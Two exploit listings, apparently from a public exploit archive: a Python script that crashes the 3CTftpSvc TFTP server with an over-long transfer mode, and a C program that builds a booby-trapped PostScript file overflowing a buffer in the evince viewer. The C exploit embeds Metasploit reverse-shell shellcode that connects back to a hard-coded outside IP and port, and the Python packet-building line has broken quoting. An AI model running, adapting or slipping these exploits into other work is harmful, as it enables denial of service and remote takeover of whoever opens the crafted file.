Exploit:
#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

# SUMMARY:

# 3CTftpSvc TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://support.3com.com/software/utilities_for_windows_32_bit.htm
# or ftp://ftp.3com.com/pub/utilbin/win32/3CTftpSvc.zip)
# It provides an implementation of the TFTPv2 protocol.

# A vulnerability has been identified in 3CTftpSvc TFTP Server, which 
could be exploited by attackers
# to execute arbitrary commands or cause a denial of service. This flaw is
# due to a buffer overflow error when handling an overly long transporting
# mode (more than 470 bytes) passed to a "GET" or "PUT" command, which 
could
# be exploited by malicious users to compromise a vulnerable system or 
crash
# an affected application.

# EXPLOIT:

import socket
import sys

host = '192.168.1.11'
port = 69

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

filename = "A"
mode = "netascii" + "A" * 469
da = "\x00\x02" + filename + "\" + mode + "\"
s.sendto(da, (host, port))

Exploit:
/*
* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
* Name: evince-ps-field-bof.c
* Date: 11/27/2006
* Version:
*     1.00 - creation
*
* Other: this idea originaly came from the bid for the 'gv' buffer 
overflow (20978), i don't
*  believe it's known until now that evince is also vulnerable.
*
* Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

// insert shellcode here, i'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. i had a 
picky time
// with the shellcodes, there must be some bad bytes. this shellcode from
// metasploit works but be SURE to set Encoder=None

/* linux_ia32_reverse -  LHOST=67.76.107.14 LPORT=5555 Size=70 
Encoder=None http://metasploit.com */
char cb[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x43\x4c\x6b\x0e\x66\x68"
"\x15\xb3\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

// location of "jmp *%esp"
char jmpesp[] = "\x77\xe7\xff\xff";

int main (int argc, char **argv) {
    FILE *fh;

    if (!(fh = fopen(*(argv+1), "w+b"))) {
        printf("%s <file.ps>\n\n", *(argv));
        printf("[-] unable to open file '%s' for writing: %s\n", 
*(argv+1), strerror(errno));
        exit(1);
    }

    fputs("%!PS-Adobe-3.0\n", fh);
    fputs("%%Title: hello.ps\n", fh);
    fputs("%%For: K-sPecial (xzziroz.net) of .aware 
(awarenetwork.org)\n", fh);
    fputs("%%BoundingBox: 24 24 588 768\n", fh);
    fputs("%%DocumentMedia: ", fh);
    for (int i = 0; i < 100; i++)
        fputc(0x90, fh);

    fwrite(cb, strlen(cb), 1, fh);

    for (int i = strlen(cb) + 100; i < 273; i++)
        fputc('A', fh);

    fwrite(jmpesp, 4, 1, fh);
    fwrite("\xe9\x02\xff\xff\xff", 5, 1, fh);

    fputc('\n', fh);

    fputs("%%DocumentData: Clean7Bit\n", fh);
    fputs("%%Orientation: Landscape\n", fh);
    fputs("%%Pages: 1\n", fh);
    fputs("%%PageOrder: Ascend\n", fh);
    fputs("%%+ encoding ISO-8859-1Encoding\n", fh);
    fputs("%%EndComments\n", fh);

    return(0);
}